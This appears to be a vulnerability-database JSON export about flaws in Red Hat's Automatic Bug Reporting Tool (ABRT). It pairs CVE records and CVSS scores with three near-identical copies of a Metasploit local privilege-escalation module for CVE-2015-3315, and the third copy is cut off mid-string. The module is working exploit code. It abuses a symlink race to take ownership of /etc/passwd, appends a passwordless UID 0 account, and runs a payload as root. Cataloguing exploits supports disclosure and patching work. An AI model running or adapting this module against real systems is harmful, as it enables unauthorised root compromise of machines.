"cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-14T18:15:00", "type": "cve", "title": "CVE-2015-1869", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869"], "modified": "2020-01-21T15:38:00", "cpe": ["cpe:/a:redhat:automatic_bug_reporting_tool:-"], "id": "CVE-2015-1869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1869", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:redhat:automatic_bug_reporting_tool:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:04:14", "description": "The event scripts in Automatic Bug Reporting Tool (ABRT) uses world-readable permission on a copy of sosreport file in problem directories, which allows local users to obtain sensitive information from /var/log/messages via unspecified vectors.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-06-26T15:29:00", "type": "cve", "title": "CVE-2015-1870", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1870"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:redhat:automatic_bug_reporting_tool:2.1.11"], "id": "CVE-2015-1870", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1870", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:redhat:automatic_bug_reporting_tool:2.1.11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:25:45", "description": "The kernel-invoked coredump processor in Automatic Bug Reporting Tool (ABRT) does not properly check the ownership of files before writing core dumps to them, which allows local users to obtain sensitive information by leveraging write permissions to the working directory of a crashed application.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-06-26T15:29:00", "type": "cve", "title": "CVE-2015-3142", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3142"], "modified": "2018-01-05T02:30:00", "cpe": ["cpe:/a:redhat:automatic_bug_reporting_tool:2.1.11"], "id": "CVE-2015-3142", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3142", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:redhat:automatic_bug_reporting_tool:2.1.11:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-03-01T21:44:07", "description": "Exploit for linux platform in category local exploits", "cvss3": {}, "published": "2018-02-17T00:00:00", "type": "zdt", "title": "ABRT - raceabrt Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-3315"], "modified": "2018-02-17T00:00:00", "id": "1337DAY-ID-29804", "href": "https://0day.today/exploit/description/29804", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'ABRT raceabrt Privilege Escalation',\r\n 'Description' => %q{\r\n This module attempts to gain root privileges on Fedora systems with\r\n a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured\r\n as the crash handler.\r\n \r\n A race condition allows local users to change ownership of arbitrary\r\n files (CVE-2015-3315). This module uses a symlink attack on\r\n '/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd,\r\n then adds a new user with UID=0 GID=0 to gain root privileges.\r\n Winning the race could take a few minutes.\r\n \r\n This module has been tested successfully on ABRT packaged version\r\n 2.1.5-1.fc19 on Fedora Desktop 19 x86_64, 2.2.1-1.fc19 on Fedora Desktop\r\n 19 x86_64 and 2.2.2-2.fc20 on Fedora Desktop 20 x86_64.\r\n \r\n Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Tavis Ormandy', # Discovery and C exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Apr 14 2015',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2015-3315' ],\r\n [ 'EDB', '36747' ],\r\n [ 'BID', '75117' ],\r\n [ 'URL', 'https://gist.github.com/taviso/fe359006836d6cd1091e' ],\r\n [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],\r\n [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/16/12' ],\r\n [ 'URL', 'https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92' ],\r\n [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-1862' ],\r\n [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-3315' ],\r\n [ 'URL', 'https://access.redhat.com/articles/1415483' ],\r\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],\r\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],\r\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1218239' ]\r\n ]\r\n ))\r\n register_options(\r\n [\r\n OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]),\r\n OptString.new('USERNAME', [ false, 'Username of new UID=0 user (default: random)', '' ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\r\n ])\r\n end\r\n \r\n def base_dir\r\n datastore['WritableDir']\r\n end\r\n \r\n def timeout\r\n datastore['TIMEOUT']\r\n end\r\n \r\n def check\r\n if cmd_exec('lsattr /etc/passwd').include? 'i'\r\n vprint_error 'File /etc/passwd is immutable'\r\n return CheckCode::Safe\r\n end\r\n \r\n kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'\r\n unless kernel_core_pattern.include? 'abrt-hook-ccpp'\r\n vprint_error 'System is NOT configured to use ABRT for crash reporting'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'System is configured to use ABRT for crash reporting'\r\n \r\n if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true'\r\n vprint_error \"Directory '/var/spool/abrt' exists. System has been patched.\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'System does not appear to have been patched'\r\n \r\n unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true'\r\n vprint_error \"Directory '/var/tmp/abrt' does NOT exist\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Directory '/var/tmp/abrt' exists\"\r\n \r\n if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'\r\n vprint_error 'abrt-ccp service NOT running'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'abrt-ccpp service is running'\r\n \r\n abrt_version = cmd_exec('yum list installed abrt | grep abrt').split(/\\s+/)[1]\r\n unless abrt_version.blank?\r\n vprint_status \"System is using ABRT package version #{abrt_version}\"\r\n end\r\n \r\n CheckCode::Detected\r\n end\r\n \r\n def upload_and_chmodx(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n register_file_for_cleanup path\r\n end\r\n \r\n def exploit\r\n if check != CheckCode::Detected\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n \r\n @chown_file = '/etc/passwd'\r\n \r\n if datastore['USERNAME'].blank?\r\n @username = rand_text_alpha rand(7..10)\r\n else\r\n @username = datastore['USERNAME']\r\n end\r\n \r\n # Upload Tavis Ormandy's raceabrt exploit:\r\n # - https://www.exploit-db.com/exploits/36747/\r\n # Cross-compiled with:\r\n # - i486-linux-musl-cc -static raceabrt.c\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-3315', 'raceabrt'\r\n fd = ::File.open path, 'rb'\r\n executable_data = fd.read fd.stat.size\r\n fd.close\r\n \r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_chmodx executable_path, executable_data\r\n \r\n # Change working directory to base_dir\r\n cmd_exec \"cd '#{base_dir}'\"\r\n \r\n # Launch raceabrt executable\r\n print_status \"Trying to own '#{@chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ...\"\r\n output = cmd_exec \"#{executable_path} #{@chown_file}\", nil, timeout\r\n output.each_line { |line| vprint_status line.chomp }\r\n \r\n # Check if we own /etc/passwd\r\n unless cmd_exec(\"[ -w #{@chown_file} ] && echo true\").include? 'true'\r\n fail_with Failure::Unknown, \"Failed to own '#{@chown_file}'\"\r\n end\r\n \r\n print_good \"Success! '#{@chown_file}' is writable\"\r\n \r\n # Add new user with no password\r\n print_status \"Adding #{@username} user to #{@chown_file} ...\"\r\n cmd_exec \"echo '#{@username}::0:0::/root:/bin/bash' >> #{@chown_file}\"\r\n \r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n \r\n # Execute payload executable\r\n vprint_status 'Executing payload...'\r\n cmd_exec \"/bin/bash -c \\\"echo #{payload_path} | su - #{@username}&\\\"\"\r\n end\r\n \r\n def on_new_session(session)\r\n if session.type.to_s.eql? 'meterpreter'\r\n session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'\r\n end\r\n \r\n # Reinstate /etc/passwd root ownership and remove new user\r\n root_owns_passwd = false\r\n new_user_removed = false\r\n \r\n if session.type.to_s.eql? 'meterpreter'\r\n # Reinstate /etc/passwd root ownership\r\n session.sys.process.execute '/bin/sh', \"-c \\\"chown root:root #{@chown_file}\\\"\"\r\n \r\n # Remove new user\r\n session.sys.process.execute '/bin/sh', \"-c \\\"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\\\"\"\r\n \r\n # Wait for clean up\r\n Rex.sleep 5\r\n \r\n # Check root ownership\r\n passwd_stat = session.fs.file.stat(@chown_file).stathash\r\n if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0\r\n root_owns_passwd = true\r\n end\r\n \r\n # Check for new user in /etc/passwd\r\n passwd_contents = session.fs.file.open(@chown_file).read.to_s\r\n unless passwd_contents.include? \"#{@username}:\"\r\n new_user_removed = true\r\n end\r\n elsif session.type.to_s.eql? 'shell'\r\n # Reinstate /etc/passwd root ownership\r\n session.shell_command_token \"chown root:root #{@chown_file}\"\r\n \r\n # Remove new user\r\n session.shell_command_token \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\"\r\n \r\n # Check root ownership\r\n passwd_owner = session.shell_command_token \"ls -l #{@chown_file}\"\r\n if passwd_owner.to_s.include? 'root'\r\n root_owns_passwd = true\r\n end\r\n \r\n # Check for new user in /etc/passwd\r\n passwd_user = session.shell_command_token \"grep '#{@username}:' #{@chown_file}\"\r\n unless passwd_user.to_s.include? \"#{@username}:\"\r\n new_user_removed = true\r\n end\r\n end\r\n \r\n unless root_owns_passwd\r\n print_warning \"Could not reinstate root ownership of #{@chown_file}\"\r\n end\r\n \r\n unless new_user_removed\r\n print_warning \"Could not remove user '#{@username}' from #{@chown_file}\"\r\n end\r\n rescue => e\r\n print_error \"Error during cleanup: #{e.message}\"\r\n ensure\r\n super\r\n end\r\nend\n\n# 0day.today [2018-03-01] #", "sourceHref": "https://0day.today/exploit/29804", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2018-02-17T17:02:52", "description": "", "published": "2018-02-15T00:00:00", "type": "packetstorm", "title": "ABRT raceabrt Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3315", "CVE-2015-1862"], "modified": "2018-02-15T00:00:00", "id": "PACKETSTORM:146411", "href": "https://packetstormsecurity.com/files/146411/ABRT-raceabrt-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ABRT raceabrt Privilege Escalation', \n'Description' => %q{ \nThis module attempts to gain root privileges on Fedora systems with \na vulnerable version of Automatic Bug Reporting Tool (ABRT) configured \nas the crash handler. \n \nA race condition allows local users to change ownership of arbitrary \nfiles (CVE-2015-3315). This module uses a symlink attack on \n'/var/tmp/abrt/*/maps' to change the ownership of /etc/passwd, \nthen adds a new user with UID=0 GID=0 to gain root privileges. \nWinning the race could take a few minutes. \n \nThis module has been tested successfully on ABRT packaged version \n2.1.5-1.fc19 on Fedora Desktop 19 x86_64, 2.2.1-1.fc19 on Fedora Desktop \n19 x86_64 and 2.2.2-2.fc20 on Fedora Desktop 20 x86_64. \n \nFedora 21 and Red Hat 7 systems are reportedly affected, but untested. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Tavis Ormandy', # Discovery and C exploit \n'Brendan Coles <bcoles[at]gmail.com>' # Metasploit \n], \n'DisclosureDate' => 'Apr 14 2015', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [[ 'Auto', {} ]], \n'References' => \n[ \n[ 'CVE', '2015-3315' ], \n[ 'EDB', '36747' ], \n[ 'BID', '75117' ], \n[ 'URL', 'https://gist.github.com/taviso/fe359006836d6cd1091e' ], \n[ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ], \n[ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/16/12' ], \n[ 'URL', 'https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92' ], \n[ 'URL', 'https://access.redhat.com/security/cve/cve-2015-1862' ], \n[ 'URL', 'https://access.redhat.com/security/cve/cve-2015-3315' ], \n[ 'URL', 'https://access.redhat.com/articles/1415483' ], \n[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ], \n[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ], \n[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1218239' ] \n] \n)) \nregister_options( \n[ \nOptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]), \nOptString.new('USERNAME', [ false, 'Username of new UID=0 user (default: random)', '' ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n]) \nend \n \ndef base_dir \ndatastore['WritableDir'] \nend \n \ndef timeout \ndatastore['TIMEOUT'] \nend \n \ndef check \nif cmd_exec('lsattr /etc/passwd').include? 'i' \nvprint_error 'File /etc/passwd is immutable' \nreturn CheckCode::Safe \nend \n \nkernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern' \nunless kernel_core_pattern.include? 'abrt-hook-ccpp' \nvprint_error 'System is NOT configured to use ABRT for crash reporting' \nreturn CheckCode::Safe \nend \nvprint_good 'System is configured to use ABRT for crash reporting' \n \nif cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true' \nvprint_error \"Directory '/var/spool/abrt' exists. System has been patched.\" \nreturn CheckCode::Safe \nend \nvprint_good 'System does not appear to have been patched' \n \nunless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true' \nvprint_error \"Directory '/var/tmp/abrt' does NOT exist\" \nreturn CheckCode::Safe \nend \nvprint_good \"Directory '/var/tmp/abrt' exists\" \n \nif cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive' \nvprint_error 'abrt-ccp service NOT running' \nreturn CheckCode::Safe \nend \nvprint_good 'abrt-ccpp service is running' \n \nabrt_version = cmd_exec('yum list installed abrt | grep abrt').split(/\\s+/)[1] \nunless abrt_version.blank? \nvprint_status \"System is using ABRT package version #{abrt_version}\" \nend \n \nCheckCode::Detected \nend \n \ndef upload_and_chmodx(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \ncmd_exec \"chmod +x '#{path}'\" \nregister_file_for_cleanup path \nend \n \ndef exploit \nif check != CheckCode::Detected \nfail_with Failure::NotVulnerable, 'Target is not vulnerable' \nend \n \n@chown_file = '/etc/passwd' \n \nif datastore['USERNAME'].blank? \n@username = rand_text_alpha rand(7..10) \nelse \n@username = datastore['USERNAME'] \nend \n \n# Upload Tavis Ormandy's raceabrt exploit: \n# - https://www.exploit-db.com/exploits/36747/ \n# Cross-compiled with: \n# - i486-linux-musl-cc -static raceabrt.c \npath = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-3315', 'raceabrt' \nfd = ::File.open path, 'rb' \nexecutable_data = fd.read fd.stat.size \nfd.close \n \nexecutable_name = \".#{rand_text_alphanumeric rand(5..10)}\" \nexecutable_path = \"#{base_dir}/#{executable_name}\" \nupload_and_chmodx executable_path, executable_data \n \n# Change working directory to base_dir \ncmd_exec \"cd '#{base_dir}'\" \n \n# Launch raceabrt executable \nprint_status \"Trying to own '#{@chown_file}' - This might take a few minutes (Timeout: #{timeout}s) ...\" \noutput = cmd_exec \"#{executable_path} #{@chown_file}\", nil, timeout \noutput.each_line { |line| vprint_status line.chomp } \n \n# Check if we own /etc/passwd \nunless cmd_exec(\"[ -w #{@chown_file} ] && echo true\").include? 'true' \nfail_with Failure::Unknown, \"Failed to own '#{@chown_file}'\" \nend \n \nprint_good \"Success! '#{@chown_file}' is writable\" \n \n# Add new user with no password \nprint_status \"Adding #{@username} user to #{@chown_file} ...\" \ncmd_exec \"echo '#{@username}::0:0::/root:/bin/bash' >> #{@chown_file}\" \n \n# Upload payload executable \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\" \nupload_and_chmodx payload_path, generate_payload_exe \n \n# Execute payload executable \nvprint_status 'Executing payload...' \ncmd_exec \"/bin/bash -c \\\"echo #{payload_path} | su - #{@username}&\\\"\" \nend \n \ndef on_new_session(session) \nif session.type.to_s.eql? 'meterpreter' \nsession.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' \nend \n \n# Reinstate /etc/passwd root ownership and remove new user \nroot_owns_passwd = false \nnew_user_removed = false \n \nif session.type.to_s.eql? 'meterpreter' \n# Reinstate /etc/passwd root ownership \nsession.sys.process.execute '/bin/sh', \"-c \\\"chown root:root #{@chown_file}\\\"\" \n \n# Remove new user \nsession.sys.process.execute '/bin/sh', \"-c \\\"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\\\"\" \n \n# Wait for clean up \nRex.sleep 5 \n \n# Check root ownership \npasswd_stat = session.fs.file.stat(@chown_file).stathash \nif passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0 \nroot_owns_passwd = true \nend \n \n# Check for new user in /etc/passwd \npasswd_contents = session.fs.file.open(@chown_file).read.to_s \nunless passwd_contents.include? \"#{@username}:\" \nnew_user_removed = true \nend \nelsif session.type.to_s.eql? 'shell' \n# Reinstate /etc/passwd root ownership \nsession.shell_command_token \"chown root:root #{@chown_file}\" \n \n# Remove new user \nsession.shell_command_token \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\" \n \n# Check root ownership \npasswd_owner = session.shell_command_token \"ls -l #{@chown_file}\" \nif passwd_owner.to_s.include? 'root' \nroot_owns_passwd = true \nend \n \n# Check for new user in /etc/passwd \npasswd_user = session.shell_command_token \"grep '#{@username}:' #{@chown_file}\" \nunless passwd_user.to_s.include? \"#{@username}:\" \nnew_user_removed = true \nend \nend \n \nunless root_owns_passwd \nprint_warning \"Could not reinstate root ownership of #{@chown_file}\" \nend \n \nunless new_user_removed \nprint_warning \"Could not remove user '#{@username}' from #{@chown_file}\" \nend \nrescue => e \nprint_error \"Error during cleanup: #{e.message}\" \nensure \nsuper \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146411/abrt_raceabrt_priv_esc.rb.txt"}], "metasploit": [{"lastseen": "2022-11-03T01:35:02", "description": "This module attempts to gain root privileges on Linux systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler. A race condition allows local users to change ownership of arbitrary files (CVE-2015-3315). This module uses a symlink attack on `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`, then adds a new user with UID=0 GID=0 to gain root privileges. Winning the race could take a few minutes. This module has been tested successfully on: abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64; abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64; abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64; abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-16T14:52:33", "type": "metasploit", "title": "ABRT raceabrt Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1862", "CVE-2015-3315"], "modified": "2021-10-06T12:54:51", "id": "MSF:EXPLOIT-LINUX-LOCAL-ABRT_RACEABRT_PRIV_ESC-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/abrt_raceabrt_priv_esc/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ABRT raceabrt Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges on Linux systems with\n a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured\n as the crash handler.\n\n A race condition allows local users to change ownership of arbitrary\n files (CVE-2015-3315). This module uses a symlink attack on\n `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`,\n then adds a new user with UID=0 GID=0 to gain root privileges.\n Winning the race could take a few minutes.\n\n This module has been tested successfully on:\n\n abrt 2.1.11-12.el7 on RHEL 7.0 x86_64;\n abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64;\n abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64;\n abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64;\n abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Tavis Ormandy', # Discovery and C exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2015-04-14',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'References' => [\n [ 'CVE', '2015-3315' ],\n [ 'EDB', '36747' ],\n [ 'BID', '75117' ],\n [ 'URL', 'https://gist.github.com/taviso/fe359006836d6cd1091e' ],\n [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],\n [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/16/12' ],\n [ 'URL', 'https://github.com/abrt/abrt/commit/80408e9e24a1c10f85fd969e1853e0f192157f92' ],\n [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-1862' ],\n [ 'URL', 'https://access.redhat.com/security/cve/cve-2015-3315' ],\n [ 'URL', 'https://access.redhat.com/articles/1415483' ],\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1218239' ]\n ],\n 'Compat' => {\n 'Meterpreter' => {\n 'Commands' => %w[\n stdapi_fs_stat\n stdapi_sys_process_execute\n ]\n }\n }\n )\n )\n register_options(\n [\n OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '900' ]),\n OptString.new('USERNAME', [ false, 'Username of new UID=0 user (default: random)', '' ])\n ]\n )\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n\n self.needs_cleanup = true\n end\n\n def base_dir\n datastore['WritableDir']\n end\n\n def timeout\n datastore['TIMEOUT']\n end\n\n def check\n if immutable?('/etc/passwd')\n vprint_error 'File /etc/passwd is immutable'\n return CheckCode::Safe\n end\n\n kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'\n unless kernel_core_pattern.include? 'abrt-hook-ccpp'\n vprint_error 'System is NOT configured to use ABRT for crash reporting'\n return CheckCode::Safe\n end\n vprint_good 'System is configured to use ABRT for crash reporting'\n\n if cmd_exec('[ -d /var/spool/abrt ] && echo true').include? 'true'\n vprint_error \"Directory '/var/spool/abrt' exists. System has been patched.\"\n return CheckCode::Safe\n end\n vprint_good 'System does not appear to have been patched'\n\n unless cmd_exec('[ -d /var/tmp/abrt ] && echo true').include? 'true'\n vprint_error \"Directory '/var/tmp/abrt' does NOT exist\"\n return CheckCode::Safe\n end\n vprint_good \"Directory '/var/tmp/abrt' exists\"\n\n if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'\n vprint_error 'abrt-ccp service NOT running'\n return CheckCode::Safe\n end\n vprint_good 'abrt-ccpp service is running'\n\n pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s\n abrt_version = pkg_info[/^abrt.*$/].to_s.split(/\\s+/)[1]\n unless abrt_version.blank?\n vprint_status \"System is using ABRT package version 